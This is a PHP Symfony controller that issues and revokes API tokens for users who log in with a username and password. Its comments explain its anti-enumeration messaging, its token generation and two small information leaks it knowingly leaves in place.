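<?php

namespace AppBundle\Controller\Authentication;

use AppBundle\Entity\JsonToken\Credentials;
use AppBundle\Entity\JsonToken\UserToken;
use AppBundle\Form\JsonToken\CredentialsType;
use FOS\RestBundle\Controller\Annotations as Rest;
use Symfony\Bundle\FrameworkBundle\Controller\Controller;
use Symfony\Component\HttpFoundation\Request;
use Symfony\Component\HttpFoundation\Response;
use Symfony\Component\HttpKernel\Exception\AccessDeniedHttpException;
use Symfony\Component\HttpKernel\Exception\BadRequestHttpException;

/**
 * Issues and revokes API tokens for users who authenticate with a
 * username/password pair.
 */
class UserTokenController extends Controller
{
    /**
     * Exchanges a username/password pair for a freshly generated API token.
     *
     * The client-facing failure message is identical whether the username is
     * unknown or the password is wrong, so the endpoint does not confirm which
     * usernames exist. The distinguishing reason is kept server-side only.
     *
     * @Rest\View(
     *     statusCode=Response::HTTP_CREATED,
     *     SerializerGroups = {"TOKEN_DETAILS", "STAFF_DETAILS", "CUSTOMER_DETAILS", "ADDRESS_DETAILS"}
     * )
     * @Rest\Post("/api-tokens")
     *
     * @param Request $request request body is bound to CredentialsType
     *
     * @return UserToken|\Symfony\Component\Form\FormInterface the persisted token,
     *                                                         or the invalid form (rendered as a validation error)
     *
     * @throws AccessDeniedHttpException when the credentials do not match a user
     */
    public function createAction(Request $request)
    {
        $credentials = new Credentials();
        $form = $this->createForm(CredentialsType::class, $credentials);
        $form->submit($request->request->all());

        if (!$form->isValid()) {
            return $form;
        }

        $em = $this->get('doctrine.orm.entity_manager');
        $user = $em->getRepository('AppBundle:BaseUser')
            ->findOneByUsername($credentials->getUsername());

        if (!$user) {
            // Unknown username. NOTE(review): no password hash is computed on
            // this path, so response timing may still differ from the
            // wrong-password path even though the message no longer does.
            return $this->invalidCredentials('unknown username');
        }

        $encoder = $this->get('security.password_encoder');
        if (!$encoder->isPasswordValid($user, $credentials->getPassword())) {
            // Wrong password; the username goes to the server log only.
            return $this->invalidCredentials(
                'bad password for user ' . $credentials->getUsername()
            );
        }

        $userToken = new UserToken();
        // random_bytes() is a CSPRNG; 50 bytes base64-encode to a 68-char value.
        $userToken->setValue(base64_encode(random_bytes(50)));
        $userToken->setCreatedAt(new \DateTime('now'));
        $userToken->setUser($user);
        $userToken->setTtl($this->getParameter('auth_token_ttl'));

        $em->persist($userToken);
        $em->flush();

        return $userToken;
    }

    /**
     * Revokes an API token. Only the token's owner may delete it.
     *
     * @Rest\View(statusCode=Response::HTTP_NO_CONTENT)
     * @Rest\Delete("/api-tokens/{id}")
     *
     * @param Request   $request   unused; kept for the action signature
     * @param UserToken $userToken resolved from {id} by the param converter
     *
     * @throws AccessDeniedHttpException when there is no authenticated user object
     * @throws BadRequestHttpException   when the token belongs to another user
     */
    public function deleteAction(Request $request, UserToken $userToken)
    {
        $securityToken = $this->get('security.token_storage')->getToken();
        $connectedUser = $securityToken ? $securityToken->getUser() : null;

        // With no security token, or an anonymous one, getUser() does not
        // yield a user object; fail closed instead of calling getId() on it.
        if (!is_object($connectedUser)) {
            throw new AccessDeniedHttpException('Authentication required');
        }

        if ($userToken->getUser()->getId() !== $connectedUser->getId()) {
            // Kept as 400 for compatibility with existing clients. Note that
            // this response still confirms the requested token id exists.
            throw new BadRequestHttpException("Cannot delete another user's token");
        }

        $em = $this->get('doctrine.orm.entity_manager');
        $em->remove($userToken);
        $em->flush();
    }

    /**
     * Rejects a login attempt with a uniform client-facing message.
     *
     * @param string $reason server-side detail of the rejection (never the
     *                       password); recorded in the application log when a
     *                       logger service is available
     *
     * @throws AccessDeniedHttpException always
     */
    private function invalidCredentials($reason)
    {
        if ($this->has('logger')) {
            $this->get('logger')->info('API token request rejected: ' . $reason);
        }

        // Deliberately does not echo $reason: the reason distinguishes
        // "unknown username" from "wrong password".
        throw new AccessDeniedHttpException('Invalid credentials');
    }
}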